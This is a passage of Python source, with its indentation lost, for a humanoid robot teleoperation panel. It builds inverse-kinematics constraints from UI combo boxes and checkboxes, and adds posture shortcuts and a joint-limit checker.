if isinstance(propertyValue, np.ndarray):
propertyValue = propertyValue.tolist()
if isinstance(propertyValue, vtk.vtkTransform):
propertyValue = list(propertyValue.GetPosition()) + list(propertyValue.GetOrientation())
self.addProperty(propertyName, propertyValue, attributes=om.PropertyAttributes(decimals=3, minimum=-100, maximum=100))
def _onPropertyChanged(self, propertySet, propertyName):
om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName)
self.constraint.__setattr__(propertyName, propertySet.getProperty(propertyName))
class EndEffectorTeleopPanel(object):
def __init__(self, panel):
self.panel = panel
self.ui = panel.ui
self.ui.eeTeleopButton.connect('clicked()', self.teleopButtonClicked)
self.ui.planButton.connect('clicked()', self.planClicked)
self.ui.updateIkButton.connect('clicked()', self.onUpdateIkClicked)
self.ui.baseCombo.connect('currentIndexChanged(const QString&)', self.baseComboChanged)
self.ui.backCombo.connect('currentIndexChanged(const QString&)', self.backComboChanged)
self.ui.lhandCombo.connect('currentIndexChanged(const QString&)', self.lhandComboChanged)
self.ui.rhandCombo.connect('currentIndexChanged(const QString&)', self.rhandComboChanged)
self.ui.lfootCombo.connect('currentIndexChanged(const QString&)', self.lfootComboChanged)
self.ui.rfootCombo.connect('currentIndexChanged(const QString&)', self.rfootComboChanged)
self.ui.leftFootPlanningSupportCheckbox.connect('toggled(bool)', self.leftFootPlanningSupportCheckboxChanged)
self.ui.rightFootPlanningSupportCheckbox.connect('toggled(bool)', self.rightFootPlanningSupportCheckboxChanged)
self.ui.leftHandPlanningSupportCheckbox.connect('toggled(bool)', self.leftHandPlanningSupportCheckboxChanged)
self.ui.rightHandPlanningSupportCheckbox.connect('toggled(bool)', self.rightHandPlanningSupportCheckboxChanged)
self.ui.pelvisPlanningSupportCheckbox.connect('toggled(bool)', self.pelvisPlanningSupportCheckboxChanged)
self.ui.leftFootExecutionSupportCheckbox.connect('toggled(bool)', self.leftFootExecutionSupportCheckboxChanged)
self.ui.rightFootExecutionSupportCheckbox.connect('toggled(bool)', self.rightFootExecutionSupportCheckboxChanged)
self.ui.leftHandExecutionSupportCheckbox.connect('toggled(bool)', self.leftHandExecutionSupportCheckboxChanged)
self.ui.rightHandExecutionSupportCheckbox.connect('toggled(bool)', self.rightHandExecutionSupportCheckboxChanged)
self.ui.pelvisExecutionSupportCheckbox.connect('toggled(bool)', self.pelvisExecutionSupportCheckboxChanged)
self.ui.executionSupportCheckbox.connect('toggled(bool)', self.executionSupportCheckboxChanged)
self.ui.finalPosePlanningOptions.connect('toggled(bool)', self.finalPosePlanningChanged)
self.ui.searchFinalPoseButton.connect('clicked()', self.searchFinalPoseClicked)
self.ui.rightGraspingHandButton.connect('clicked()', self.rightGraspingHandButtonClicked)
self.ui.leftGraspingHandButton.connect('clicked()', self.leftGraspingHandButtonClicked)
self.palmOffsetDistance = 0.0
self.palmGazeAxis = [0.0, 1.0, 0.0]
self.constraintSet = None
lcmUtils.addSubscriber('CANDIDATE_ROBOT_ENDPOSE', lcmbotcore.robot_state_t, self.onCandidateEndPose)
#self.ui.interactiveCheckbox.visible = False
#self.ui.updateIkButton.visible = False
if 'kneeJointLimits' in drcargs.getDirectorConfig():
self.kneeJointLimits = drcargs.getDirectorConfig()['kneeJointLimits']
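# Note: self.kneeJointLimits is only set when 'kneeJointLimits' is present in the director config;
# the base-constraint branches in updateConstraints() that call createKneePostureConstraint assume it exists.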
def setComboText(self, combo, text):
index = combo.findText(text)
assert index >= 0
combo.setCurrentIndex(index)
def getComboText(self, combo):
return str(combo.currentText)
def setCheckboxState(self, checkbox, state):
assert isinstance(state, bool)
checkbox.checked = state
def getCheckboxState(self, checkbox):
return checkbox.checked
def getBaseConstraint(self):
return self.getComboText(self.ui.baseCombo)
def setBaseConstraint(self, value):
return self.setComboText(self.ui.baseCombo, value)
def getBackConstraint(self):
return self.getComboText(self.ui.backCombo)
def setBackConstraint(self, value):
return self.setComboText(self.ui.backCombo, value)
def getLHandConstraint(self):
return self.getComboText(self.ui.lhandCombo)
def setLHandConstraint(self, value):
return self.setComboText(self.ui.lhandCombo, value)
def getRHandConstraint(self):
return self.getComboText(self.ui.rhandCombo)
def setRHandConstraint(self, value):
return self.setComboText(self.ui.rhandCombo, value)
def getLFootConstraint(self):
return self.getComboText(self.ui.lfootCombo)
def setLFootConstraint(self, value):
return self.setComboText(self.ui.lfootCombo, value)
def getRFootConstraint(self):
return self.getComboText(self.ui.rfootCombo)
def setRFootConstraint(self, value):
return self.setComboText(self.ui.rfootCombo, value)
def getLFootPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.leftFootPlanningSupportCheckbox)
def setLFootPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftFootPlanningSupportCheckbox, value)
def getRFootPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.rightFootPlanningSupportCheckbox)
def setRFootPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightFootPlanningSupportCheckbox, value)
def getLHandPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.leftHandPlanningSupportCheckbox)
def setLHandPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftHandPlanningSupportCheckbox, value)
def getRHandPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.rightHandPlanningSupportCheckbox)
def setRHandPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightHandPlanningSupportCheckbox, value)
def getPelvisPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.pelvisPlanningSupportCheckbox)
def setPelvisPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.pelvisPlanningSupportCheckbox, value)
def getLFootExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.leftFootExecutionSupportCheckbox)
def setLFootExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftFootExecutionSupportCheckbox, value)
def getRFootExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.rightFootExecutionSupportCheckbox)
def setRFootExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightFootExecutionSupportCheckbox, value)
def getLHandExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.leftHandExecutionSupportCheckbox)
def setLHandExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftHandExecutionSupportCheckbox, value)
def getRHandExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.rightHandExecutionSupportCheckbox)
def setRHandExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightHandExecutionSupportCheckbox, value)
def getPelvisExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.pelvisExecutionSupportCheckbox)
def setPelvisExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.pelvisExecutionSupportCheckbox, value)
def getExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.executionSupportCheckbox)
def baseComboChanged(self):
self.updateConstraints()
def backComboChanged(self):
self.updateConstraints()
def lhandComboChanged(self):
self.updateConstraints()
def rhandComboChanged(self):
self.updateConstraints()
def lfootComboChanged(self):
self.updateConstraints()
def rfootComboChanged(self):
self.updateConstraints()
def leftFootExecutionSupportCheckboxChanged(self):
if not self.getLFootExecutionSupportEnabled():
self.setLFootPlanningSupportEnabled(False)
self.panel.manipPlanner.leftFootSupportEnabled = self.getLFootExecutionSupportEnabled()
self.updateQuasistaticFlag()
def rightFootExecutionSupportCheckboxChanged(self):
if not self.getRFootExecutionSupportEnabled():
self.setRFootPlanningSupportEnabled(False)
self.panel.manipPlanner.rightFootSupportEnabled = self.getRFootExecutionSupportEnabled()
self.updateQuasistaticFlag()
def leftHandExecutionSupportCheckboxChanged(self):
if not self.getLHandExecutionSupportEnabled():
self.setLHandPlanningSupportEnabled(False)
self.panel.manipPlanner.leftHandSupportEnabled = self.getLHandExecutionSupportEnabled()
self.updateQuasistaticFlag()
def rightHandExecutionSupportCheckboxChanged(self):
if not self.getRHandExecutionSupportEnabled():
self.setRHandPlanningSupportEnabled(False)
self.panel.manipPlanner.rightHandSupportEnabled = self.getRHandExecutionSupportEnabled()
self.updateQuasistaticFlag()
def pelvisExecutionSupportCheckboxChanged(self):
if not self.getPelvisExecutionSupportEnabled():
self.setPelvisPlanningSupportEnabled(False)
self.panel.manipPlanner.pelvisSupportEnabled = self.getPelvisExecutionSupportEnabled()
self.updateQuasistaticFlag()
def executionSupportCheckboxChanged(self):
self.updateQuasistaticFlag()
self.panel.manipPlanner.setPublishPlansWithSupports(self.getExecutionSupportEnabled())
def leftFootPlanningSupportCheckboxChanged(self):
if self.getLFootPlanningSupportEnabled():
self.setLFootExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def rightFootPlanningSupportCheckboxChanged(self):
if self.getRFootPlanningSupportEnabled():
self.setRFootExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def leftHandPlanningSupportCheckboxChanged(self):
if self.getLHandPlanningSupportEnabled():
self.setLHandExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def rightHandPlanningSupportCheckboxChanged(self):
if self.getRHandPlanningSupportEnabled():
self.setRHandExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def pelvisPlanningSupportCheckboxChanged(self):
if self.getPelvisPlanningSupportEnabled():
self.setPelvisExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def updateQuasistaticFlag(self):
lfootEnabled = self.getLFootExecutionSupportEnabled()
rfootEnabled = self.getRFootExecutionSupportEnabled()
lhandEnabled = self.getLHandExecutionSupportEnabled()
rhandEnabled = self.getRHandExecutionSupportEnabled()
pelvisEnabled = self.getPelvisExecutionSupportEnabled()
if (lhandEnabled or rhandEnabled or pelvisEnabled) or (lfootEnabled and rfootEnabled):
self.panel.manipPlanner.plansWithSupportsAreQuasistatic = True
else:
self.panel.manipPlanner.plansWithSupportsAreQuasistatic = False
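# In other words, a plan is marked quasistatic whenever any hand or the pelvis is used as a support,
# or when both feet are supports.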
def onGoalFrameModified(self, frame):
if self.constraintSet and self.ui.interactiveCheckbox.checked:
self.updateIk()
def onUpdateIkClicked(self):
self.updateIk()
def updateIk(self):
endPose, info = self.constraintSet.runIk()
self.panel.showPose(self.constraintSet.endPose)
app.displaySnoptInfo(info)
def updateCollisionEnvironment(self):
# the collision environment is only supported by the matlab backend ik planner
if self.panel.ikPlanner.planningMode != 'matlabdrake':
return
affs = self.panel.affordanceManager.getCollisionAffordances()
if not affs:
self.panel.ikPlanner.ikServer.clearEnvironment()
else:
urdfStr = affordanceurdf.urdfStringFromAffordances(affs)
self.panel.ikPlanner.ikServer.setEnvironment(urdfStr)
def planClicked(self):
if not self.ui.eeTeleopButton.checked and not self.getCheckboxState(self.ui.finalPosePlanningOptions):
return
self.updateCollisionEnvironment()
self.generatePlan()
def generatePlan(self):
self.updateConstraints()
if not self.ui.interactiveCheckbox.checked:
self.updateIk()
if self.getCheckboxState(self.ui.finalPosePlanningOptions):
self.constraintSet.endPose = self.panel.ikPlanner.jointController.poses['reach_end']
# todo- need an option here
goalMode = ikplanner.getIkOptions().getProperty('Goal planning mode')
if goalMode == 1 or ikplanner.getIkOptions().getPropertyEnumValue('Use collision') == 'RRT Connect':
plan = self.constraintSet.runIkTraj()
elif ikplanner.getIkOptions().getPropertyEnumValue('Use collision') == 'RRT*':
collisionEndEffectorName = ( self.panel.ikPlanner.handModels[0].handLinkName if self.constraintSet.ikParameters.rrtHand == 'left'
else self.panel.ikPlanner.handModels[1].handLinkName )
constraintToRemove = []
for constraint in self.constraintSet.constraints:
if hasattr(constraint, 'linkName') and constraint.linkName == collisionEndEffectorName:
constraintToRemove.append(constraint)
for constraint in constraintToRemove:
self.constraintSet.constraints.remove(constraint)
plan = self.constraintSet.runIkTraj()
else:
plan = self.constraintSet.planEndPoseGoal()
self.panel.showPlan(plan)
def teleopButtonClicked(self):
if self.ui.eeTeleopButton.checked:
self.setCheckboxState(self.ui.finalPosePlanningOptions, False)
self.activate()
else:
self.deactivate()
def activate(self):
self.ui.eeTeleopButton.blockSignals(True)
self.ui.eeTeleopButton.checked = True
self.ui.eeTeleopButton.blockSignals(False)
self.panel.endEffectorTeleopActivated()
self.createGoalFrames()
self.updateConstraints()
def deactivate(self):
self.ui.eeTeleopButton.blockSignals(True)
self.ui.eeTeleopButton.checked = False
self.ui.eeTeleopButton.blockSignals(False)
self.removePlanFolder()
self.panel.endEffectorTeleopDeactivated()
@staticmethod
def getGoalFrame(linkName):
return om.findObjectByName('%s constraint frame' % linkName)
def updateGoalFrame(self, linkName, transform):
goalFrame = self.getGoalFrame(linkName)
if not goalFrame:
return
goalFrame.copyFrame(transform)
return goalFrame
def updatePlanningSupports(self):
self.panel.ikPlanner.leftFootSupportEnabled = self.getLFootPlanningSupportEnabled()
self.panel.ikPlanner.rightFootSupportEnabled = self.getRFootPlanningSupportEnabled()
self.panel.ikPlanner.leftHandSupportEnabled = self.getLHandPlanningSupportEnabled()
self.panel.ikPlanner.rightHandSupportEnabled = self.getRHandPlanningSupportEnabled()
self.panel.ikPlanner.pelvisSupportEnabled = self.getPelvisPlanningSupportEnabled()
def updateConstraints(self):
if not self.ui.eeTeleopButton.checked and not self.getCheckboxState(self.ui.finalPosePlanningOptions):
return
self.updatePlanningSupports()
ikPlanner = self.panel.ikPlanner
startPoseName = 'reach_start'
startPose = self.panel.planningUtils.getPlanningStartPose()
ikPlanner.addPose(startPose, startPoseName)
# Humanoid, i.e. robot has feet and is not a fixed base arm
if not ikPlanner.fixedBaseArm and not ikPlanner.robotNoFeet:
constraints = []
constraints.append(ikPlanner.createQuasiStaticConstraint())
constraints.append(ikPlanner.createLockedNeckPostureConstraint(startPoseName))
if self.getLFootConstraint() == 'fixed':
constraints.append(ikPlanner.createFixedLinkConstraints(startPoseName, ikPlanner.leftFootLink, tspan=[0.0, 1.0], lowerBound=-0.0001*np.ones(3), upperBound=0.0001*np.ones(3), angleToleranceInDegrees=0.1))
elif self.getLFootConstraint() == 'constrained':
constraints.extend(ikPlanner.createSixDofLinkConstraints(startPoseName, ikPlanner.leftFootLink, tspan=[1.0, 1.0]))
elif self.getLFootConstraint() == 'sliding':
constraints.extend(ikPlanner.createSlidingFootConstraints(startPoseName)[:2])
if self.getRFootConstraint() == 'fixed':
constraints.append(ikPlanner.createFixedLinkConstraints(startPoseName, ikPlanner.rightFootLink, tspan=[0.0, 1.0], lowerBound=-0.0001*np.ones(3), upperBound=0.0001*np.ones(3), angleToleranceInDegrees=0.1))
elif self.getRFootConstraint() == 'constrained':
constraints.extend(ikPlanner.createSixDofLinkConstraints(startPoseName, ikPlanner.rightFootLink, tspan=[1.0, 1.0]))
elif self.getRFootConstraint() == 'sliding':
constraints.extend(ikPlanner.createSlidingFootConstraints(startPoseName)[2:])
if self.getBackConstraint() == 'fixed':
constraints.append(ikPlanner.createLockedBackPostureConstraint(startPoseName))
ikPlanner.setBackLocked(True)
elif self.getBackConstraint() == 'limited':
constraints.append(ikPlanner.createMovingBackLimitedPostureConstraint())
ikPlanner.setBackLocked(False)
elif self.getBackConstraint() == 'free':
constraints.append(ikPlanner.createMovingBackPostureConstraint())
ikPlanner.setBackLocked(False)
if self.getBaseConstraint() == 'fixed':
constraints.append(ikPlanner.createLockedBasePostureConstraint(startPoseName, lockLegs=False))
ikPlanner.setBaseLocked(True)
if self.getBaseConstraint() == 'constrained':
constraints.extend(ikPlanner.createSixDofLinkConstraints(startPoseName, ikPlanner.pelvisLink, tspan=[1.0, 1.0]))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'xyz only':
constraints.append(ikPlanner.createXYZMovingBasePostureConstraint(startPoseName))
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'z only':
constraints.append(ikPlanner.createZMovingBasePostureConstraint(startPoseName))
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'limited':
constraints.append(ikPlanner.createMovingBaseSafeLimitsConstraint())
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'free':
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
# Fixed Base Arm: Remove all except the fixed base constraint
if ikPlanner.fixedBaseArm:
constraints = []
constraints.append(ikPlanner.createLockedBasePostureConstraint(startPoseName, lockLegs=False))
if ikPlanner.robotNoFeet:
constraints = []
constraints.append(ikPlanner.createLockedBasePostureConstraint(startPoseName))
# Only add Back constraints if robot has a back
if ikPlanner.getJointGroup('Back'):
if self.getBackConstraint() == 'fixed':
constraints.append(ikPlanner.createLockedBackPostureConstraint(startPoseName))
ikPlanner.setBackLocked(True)
elif self.getBackConstraint() == 'limited':
constraints.append(ikPlanner.createMovingBackLimitedPostureConstraint())
ikPlanner.setBackLocked(False)
elif self.getBackConstraint() == 'free':
constraints.append(ikPlanner.createMovingBackPostureConstraint())
ikPlanner.setBackLocked(False)
# Don't generate end effector constraints if in final pose planning
if not self.getCheckboxState(self.ui.finalPosePlanningOptions):
for handModel in ikPlanner.handModels:
side = handModel.side
if (side == "left"):
thisHandConstraint = self.getLHandConstraint()
elif (side == "right"):
thisHandConstraint = self.getRHandConstraint()
linkName = ikPlanner.getHandLink(side)
graspToHand = ikPlanner.newPalmOffsetGraspToHandFrame(side, self.palmOffsetDistance)
graspToWorld = self.getGoalFrame(linkName)
p, q = ikPlanner.createPositionOrientationGraspConstraints(side, graspToWorld, graspToHand)
g = ikPlanner.createGazeGraspConstraint(side, graspToWorld, graspToHand, targetAxis=list(self.palmGazeAxis), bodyAxis=list(self.palmGazeAxis))
p.tspan = [1.0, 1.0]
q.tspan = [1.0, 1.0]
g.tspan = [1.0, 1.0]
if thisHandConstraint == 'arm fixed':
if (side == "left"):
constraints.append(ikPlanner.createLockedLeftArmPostureConstraint(startPoseName))
elif (side == "right"):
constraints.append(ikPlanner.createLockedRightArmPostureConstraint(startPoseName))
ikPlanner.setArmLocked(side,True)
elif thisHandConstraint == 'ee fixed':
constraints.extend([p, q])
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'position':
constraints.extend([p])
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'gaze':
constraints.extend([p, g])
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'orbit':
graspToHand = ikPlanner.newPalmOffsetGraspToHandFrame(side, distance=0.07)
constraints.extend(ikPlanner.createGraspOrbitConstraints(side, graspToWorld, graspToHand))
constraints[-3].tspan = [1.0, 1.0]
if ikPlanner.defaultIkParameters.useCollision != 'none':
constraints[-2].tspan = [0.5, 1.0]
constraints[-1].tspan = [0.5, 1.0]
else:
constraints[-2].tspan = [1.0, 1.0]
constraints[-1].tspan = [1.0, 1.0]
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'free':
ikPlanner.setArmLocked(side,False)
if hasattr(self,'reachSide'):
if self.reachSide == 'left':
endEffectorName = ikPlanner.handModels[0].handLinkName # 'l_hand'
else:
endEffectorName = ikPlanner.handModels[1].handLinkName # 'r_hand'
constraints.append(ikPlanner.createActiveEndEffectorConstraint(endEffectorName,ikPlanner.getPalmPoint(self.reachSide)))
self.constraintSet = ikplanner.ConstraintSet(ikPlanner, constraints, 'reach_end', startPoseName)
handLinks = []
for handModel in ikPlanner.handModels: handLinks.append(handModel.handLinkName)
for constraint in constraints:
if hasattr(constraint, 'linkName') and constraint.linkName in handLinks:
continue
if isinstance(constraint, ikconstraints.PositionConstraint):
frameObj = self.getGoalFrame(constraint.linkName)
if frameObj:
constraint.referenceFrame = frameObj.transform
elif isinstance(constraint, ikconstraints.QuatConstraint):
frameObj = self.getGoalFrame(constraint.linkName)
if frameObj:
constraint.quaternion = frameObj.transform
elif isinstance(constraint, ikconstraints.WorldGazeDirConstraint):
frameObj = self.getGoalFrame(constraint.linkName)
if frameObj:
constraint.targetFrame = frameObj.transform
if not self.getCheckboxState(self.ui.finalPosePlanningOptions):
self.onGoalFrameModified(None)
om.removeFromObjectModel(self.getConstraintFolder())
folder = self.getConstraintFolder()
for i, pc in enumerate(constraints):
constraintItem = ConstraintItem(pc)
om.addToObjectModel(constraintItem, parentObj=folder)
def addHandMesh(self, handModel, goalFrame):
handObj = handModel.newPolyData('reach goal left hand', self.panel.teleopRobotModel.views[0], parent=goalFrame)
handFrame = handObj.children()[0]
handFrame.copyFrame(goalFrame.transform)
frameSync = vis.FrameSync()
frameSync.addFrame(goalFrame)
frameSync.addFrame(handFrame)
goalFrame.sync = frameSync
@staticmethod
def removePlanFolder():
om.removeFromObjectModel(om.findObjectByName('teleop plan'))
@staticmethod
def getConstraintFrameFolder():
return om.getOrCreateContainer('constraint frames', parentObj=om.getOrCreateContainer('teleop plan', parentObj=om.findObjectByName('planning')))
@staticmethod
def getConstraintFolder():
return om.getOrCreateContainer('ik constraints', parentObj=om.getOrCreateContainer('teleop plan', parentObj=om.findObjectByName('planning')))
def createGoalFrames(self):
ikPlanner = self.panel.ikPlanner
startPose = self.panel.planningUtils.getPlanningStartPose()
self.removePlanFolder()
folder = self.getConstraintFrameFolder()
for handModel in ikPlanner.handModels:
side = handModel.side
linkName = ikPlanner.getHandLink(side)
frameName = '%s constraint frame' % linkName
graspToHand = ikPlanner.newPalmOffsetGraspToHandFrame(side, self.palmOffsetDistance)
graspToWorld = ikPlanner.newGraspToWorldFrame(startPose, side, graspToHand)
om.removeFromObjectModel(om.findObjectByName(frameName))
frame = vis.showFrame(graspToWorld, frameName, parent=folder, scale=0.2)
#frame.setProperty('Edit', True)
frame.connectFrameModified(self.onGoalFrameModified)
#addHandMesh(handModels[side], frame)
if not ikPlanner.fixedBaseArm and not ikPlanner.robotNoFeet:
for linkName in [ikPlanner.leftFootLink, ikPlanner.rightFootLink, ikPlanner.pelvisLink]:
frameName = linkName + ' constraint frame'
om.removeFromObjectModel(om.findObjectByName(frameName))
frame = vis.showFrame(ikPlanner.getLinkFrameAtPose(linkName, startPose), frameName, parent=folder, scale=0.2)
frame.connectFrameModified(self.onGoalFrameModified)
def newReachTeleop(self, frame, side, reachTargetObject=None):
'''
reachTargetObject is the object we are reaching toward. For some types
of plans this object may be treated in a special way, for example when
doing planning with collision avoidance.
'''
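# Note (added): a hypothetical usage sketch, not part of the original code.
# Assuming a TeleopPanel instance named 'panel' and a vtkTransform 'goalFrame'
# describing the desired palm pose, a reach teleop session could be started as:
#   frameObj = panel.endEffectorTeleop.newReachTeleop(goalFrame, 'left')
# The returned frame object can then be edited interactively to drive the IK goal.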
self.deactivate()
self.panel.jointTeleop.deactivate()
self.setBaseConstraint('xyz only')
self.setBackConstraint('limited')
self.setLFootConstraint('fixed')
self.setRFootConstraint('fixed')
self.setLHandConstraint('arm fixed')
self.setRHandConstraint('arm fixed')
if side == 'left':
if self.panel.ikPlanner.defaultIkParameters.useCollision != 'none':
self.setLHandConstraint('ee fixed')
else:
self.setLHandConstraint('ee fixed')
elif side == 'right':
if self.panel.ikPlanner.defaultIkParameters.useCollision != 'none':
self.setRHandConstraint('ee fixed')
else:
self.setRHandConstraint('ee fixed')
self.reachTargetObject = reachTargetObject
self.reachSide = side
self.activate()
return self.updateGoalFrame(self.panel.ikPlanner.getHandLink(side), frame)
def finalPosePlanningChanged(self):
if self.getCheckboxState(self.ui.finalPosePlanningOptions):
self.setCheckboxState(self.ui.eeTeleopButton, False)
if self.getFinalPoseGraspingHand() == 'left':
self.ui.lhandCombo.enabled = False
else:
self.ui.rhandCombo.enabled = False
self.deactivate()
self.initFinalPosePlanning()
else:
self.terminateFinalPosePlanning()
self.ui.lhandCombo.enabled = True
self.ui.rhandCombo.enabled = True
def rightGraspingHandButtonClicked(self):
self.ui.rightGraspingHandButton.checked = True
self.ui.leftGraspingHandButton.checked = False
self.terminateFinalPosePlanning()
self.initFinalPosePlanning()
ikplanner.getIkOptions().setProperty('RRT hand', 1)
self.ui.rhandCombo.enabled = False
self.ui.lhandCombo.enabled = True
def leftGraspingHandButtonClicked(self):
self.ui.rightGraspingHandButton.checked = False
self.ui.leftGraspingHandButton.checked = True
self.terminateFinalPosePlanning()
self.initFinalPosePlanning()
ikplanner.getIkOptions().setProperty('RRT hand', 0)
self.ui.rhandCombo.enabled = True
self.ui.lhandCombo.enabled = False
def initFinalPosePlanning(self):
if drcargs.getDirectorConfig()['modelName'] != 'valkyrie':
message = 'Final pose planning is not yet available for %s' % drcargs.getDirectorConfig()['modelName']
QtGui.QMessageBox.warning(app.getMainWindow(), 'Model not supported', message,
QtGui.QMessageBox.Ok)
self.setCheckboxState(self.ui.finalPosePlanningOptions, False)
return
pelvisFrame = self.panel.ikPlanner.robotModel.getLinkFrame(self.panel.ikPlanner.pelvisLink)
t = transformUtils.copyFrame(pelvisFrame)
t.PreMultiply()
if self.getFinalPoseGraspingHand() == 'left':
rotation = [0, 90, -90]
else:
rotation = [0, -90, -90]
t.Concatenate(transformUtils.frameFromPositionAndRPY([0.4,0,0], rotation))
handFactory = HandFactory(self.panel.teleopRobotModel)
handFactory.placeHandModelWithTransform(t, self.panel.teleopRobotModel.views[0],
self.getFinalPoseGraspingHand(), 'Final Pose End Effector', 'planning')
def terminateFinalPosePlanning(self):
finalPoseEE = om.findObjectByName('Final Pose End Effector')
om.removeFromObjectModel(finalPoseEE)
def getFinalPoseGraspingHand(self):
if self.ui.rightGraspingHandButton.checked:
return 'right'
else:
return 'left'
def searchFinalPoseClicked(self):
self.updateConstraints()
self.updateCollisionEnvironment()
frame = om.findObjectByName('Final Pose End Effector frame')
handTransform = transformUtils.copyFrame(frame.transform)
handTransform.PreMultiply()
palmToHand = self.panel.ikPlanner.getPalmToHandLink(self.getFinalPoseGraspingHand())
palmToHand = palmToHand.GetLinearInverse()
handTransform.Concatenate(palmToHand)
endPose, info = self.constraintSet.searchFinalPose(self.getFinalPoseGraspingHand(), handTransform)
if info == 1:
self.panel.showPose(self.constraintSet.endPose)
app.displaySnoptInfo(info)
def onCandidateEndPose(self, msg):
if not self.getCheckboxState(self.ui.finalPosePlanningOptions) and not self.ui.eeTeleopButton.checked:
pose = robotstate.convertStateMessageToDrakePose(msg)
self.panel.showPose(pose)
class PosturePlanShortcuts(object):
def __init__(self, jointController, ikPlanner, planningUtils, widget=None):
self.jointController = jointController
self.ikPlanner = ikPlanner
self.planningUtils = planningUtils
widget = widget or app.getMainWindow()
app.addShortcut(widget, 'Ctrl+Shift+S', self.planStand)
app.addShortcut(widget, 'Ctrl+Shift+N', self.planNominal)
app.addShortcut(widget, 'Ctrl+Shift+L', functools.partial(self.planPreGrasp, 'left'))
app.addShortcut(widget, 'Ctrl+Shift+R', functools.partial(self.planPreGrasp, 'right'))
def planStand(self):
self.ikPlanner.computeStandPlan(self.planningUtils.getPlanningStartPose())
def planNominal(self):
self.ikPlanner.computeNominalPlan(self.planningUtils.getPlanningStartPose())
def planPreGrasp(self, side):
startPose = self.jointController.q # wxm
endPose = self.ikPlanner.getMergedPostureFromDatabase(startPose, 'General', 'arm up pregrasp', side=side)
self.ikPlanner.computePostureGoal(startPose, endPose)
class JointLimitChecker(object):
def __init__(self, robotModel, sensorJointController):
self.robotModel = robotModel
self.sensorJointController = sensorJointController
self.jointLimitsMin = np.array([self.robotModel.model.getJointLimits(jointName)[0] for jointName in robotstate.getDrakePoseJointNames()])
self.jointLimitsMax = np.array([self.robotModel.model.getJointLimits(jointName)[1] for jointName in robotstate.getDrakePoseJointNames()])
self.joints = robotstate.matchJoints('^(?!base_)') # all but base joints
self.inflationAmount = np.radians(0.3)
self.timer = TimerCallback(targetFps=1)
self.timer.callback = self.update
self.warningButton = None
self.action = None
def update(self):
limitData = self.checkJointLimits()
if limitData:
self.notifyUserStatusBar(limitData)
else:
self.clearStatusBarWarning()
def start(self):
self.action.checked = True
self.timer.start()
def stop(self):
self.action.checked = False
self.timer.stop()
def setupMenuAction(self):
self.action = app.addMenuAction('Tools', 'Joint Limit Checker')
self.action.setCheckable(True)
self.action.checked = self.timer.isActive()
self.action.connect('triggered()', self.onActionChanged)
def onActionChanged(self):
if self.action.checked:
self.start()
else:
self.stop()
def clearStatusBarWarning(self):
if self.warningButton:
self.warningButton.deleteLater()
self.warningButton = None
def notifyUserStatusBar(self, limitData):
if self.warningButton:
return
def showDialog():
limitData = self.checkJointLimits()
if limitData:
self.notifyUserDialog(limitData)
self.clearStatusBarWarning()
self.warningButton = QtGui.QPushButton('Joint Limit Warning')
self.warningButton.setStyleSheet("background-color:red")
self.warningButton.connect('clicked()', showDialog)
app.getMainWindow().statusBar().insertPermanentWidget(0, self.warningButton)
def notifyUserDialog(self, limitData):
message = '\n'.join(['%s by %.2f degrees' % (name, np.degrees(epsilon)) for name, epsilon, jointPosition in limitData])
message = 'The following joints have been detected to exceed joint limits specified by the model:\n\n' + message + '\n\n'
message += 'Would you like to update the joint limits used by the planning robot model? If you select no '\
'then the joint limit checker will be disabled (use the Tools menu to re-enable).'
msgBox = QtGui.QMessageBox()
msgBox.setText(message)
msgBox.addButton(QtGui.QPushButton('No'), QtGui.QMessageBox.NoRole)
msgBox.addButton(QtGui.QPushButton('Yes'), QtGui.QMessageBox.YesRole)
choice = msgBox.exec_()
if choice == 0: # No
# don't do anything except close the dialog window
return
else:
self.extendJointLimitsAsExceeded(limitData)
def extendJointLimitsAsExceeded(self, limitData):
# inflate the epsilon
limitData = [(jointName, epsilon+np.sign(epsilon)*self.inflationAmount, jointPosition) for jointName, epsilon, jointPosition in limitData]
# update limits on server
panel.ikPlanner.ikServer.updateJointLimits(limitData)
panel.ikPlanner.plannerPub.updateJointLimits(limitData)
# update limits on checker
for jointName, epsilon, jointPosition in limitData:
